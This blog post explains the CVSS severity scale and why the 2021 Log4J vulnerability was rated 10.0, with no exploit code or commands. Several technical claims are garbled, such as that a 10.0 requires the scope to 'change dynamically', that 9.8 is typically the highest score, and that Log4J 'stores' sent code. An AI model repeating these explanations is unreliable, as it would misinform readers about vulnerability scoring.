What the 10 means on a CVSS score and why the log4j was such a big deal
Posted 14 Feb at 6:26 am in Productivity
[6 min read]
What is the CVSS?
The Common Vulnerability Scoring System (CVSS) is a scoring scale upheld by the CVSS Special Interest Group to rank vulnerabilities by severity. The criteria that give a vulnerability its CVSS score are grouped under two umbrella categories.
Exploitability metrics gauge how easy it is to exploit a vulnerability, and impact metrics determine the extent of what is lost in the event of an attack, defined by the CIA triad, confidentiality, integrity, and availability.
In the latest version, CVSS version 3.1, here are the vulnerability management metrics and their groups:
- Attack Vector
- Attack Complexity
- Privileges Required
- User Interaction
What does a CVSS score of 10 mean?
To make communicating the severity of vulnerabilities to less-technical people more straightforward, the CVSS groups the scored vulnerabilities into different brackets.
CVSS Score Qualitative Ratings:
0.0 – No severity
0.1 – 3.9 – Low severity
4.0 – 6.9 – Medium severity
7.0 – 8.9 – High severity
9.0 – 10.0 – Critical Severity
Several other factors impact a CVSS severity score, such as the vulnerability’s exploit code maturity, remediation level, and report confidence. Typically, the highest possible score of a critical and destructive vulnerability is 9.8.
Overall, around 14% of vulnerabilities have CVSS 9.8. Only a minute fraction of those rank CVSS 10.0. Vulnerabilities with a score of 9.8 have high impact scores, exploitability metrics are at maximum severity, and the code is actively dangerous.
The only way for a vulnerability to reach the ultimate critical status is for the scope of the vulnerability to change dynamically, posing the greatest threat to confidentiality, integrity, and availability.
CVSS 10.0 vulnerabilities are the most difficult to identify, track, analyze, and reverse engineer for cybersecurity professionals. Imagine trying to solve a complex math question, but every time you moved to your calculator and returned, the problem had changed.
Once organizations identify operationally critical threats, they can conduct vulnerability evaluations to patch the issue. While there are dozens of types of vulnerabilities in network security, most of them have a vulnerability severity level of 1.0 to 5.0.
What was Log4J?
The Log4J vulnerability set the internet on fire. Throughout 2021 we saw handfuls of head-turning cyber attacks and vulnerabilities. Log4J was arguably the largest and most impactful one of the year.
While cybercriminals rushed to exploit this vulnerability, they kept dozens of cybersecurity professionals and developers hustling, trying to identify how many products and users were affected, how to stop it, and how to patch the vulnerability.
How did Log4J start?
Minecraft, one of the largest video games on the market, lies at the beginning of Log4J’s history. The game amasses over 141 million players per year, and some of them discovered they could run code on servers and other players’ computers.
While Minecraft’s developers quickly patched the issue, the game is built on Java, and Java is almost everywhere. Soon, the vulnerability appeared on other products and services; Amazon, Apple’s iCloud, Cisco, Tesla, and Twitter were all now exposed to this new vulnerability.
Log4J allowed malicious users to send code to Log4J. It would store the code and leave a virtual door open for hackers to take over servers and information. Cybersecurity professionals note this process as one of Java’s design flaws.
Pairs the flaw with companies heavily relying on Log4J and performing uncomprehensive vulnerability analyses, Log4J provides cybercriminals the perfect opportunity to wreak havoc.
Why is Log4J is such a big deal?
With barely a few keystrokes, cybercriminals could waltz into some of the world’s largest company’s servers, completely bypassing password, two-factor authentication, and in-server security. Once penetrated, hackers could do anything they’d like.
Installing ransomware, selling data on the black market, embedding malware hidden in plain sight, harvesting user information, and even targetting individuals working at these companies were all potentially dire outcomes of a single vulnerability.
Netlab quotes at least ten different families of malware circulating for this vulnerability, and everything from bots to cyber attackers want a piece of it. For the technical giants, such as Microsoft, Apple, Amazon, and Tesla, patching the Log4J vulnerability was relatively straightforward.
However, countless third-party service providers heavily rely on Log4J, and businesses who depend on them must hope that they dedicate the resources to fix the issue. Some barely have the resources to do so, and until now, some sources say that not everyone has fully recovered.
By now, you’ve likely concluded that the Log4J vulnerability scored CVSS 10.0 out of 10.0, mostly because of its diversity, danger, and ubiquity. Events such as the Log4J incident showcase how vital vulnerability mitigation is.
For months, organizations, vendors, and even individuals had Log4J’s priority level at the top of every list. While it wasn’t the most significant vulnerability to computer information security in history, it posed tremendous threats to countless users and high-profile companies.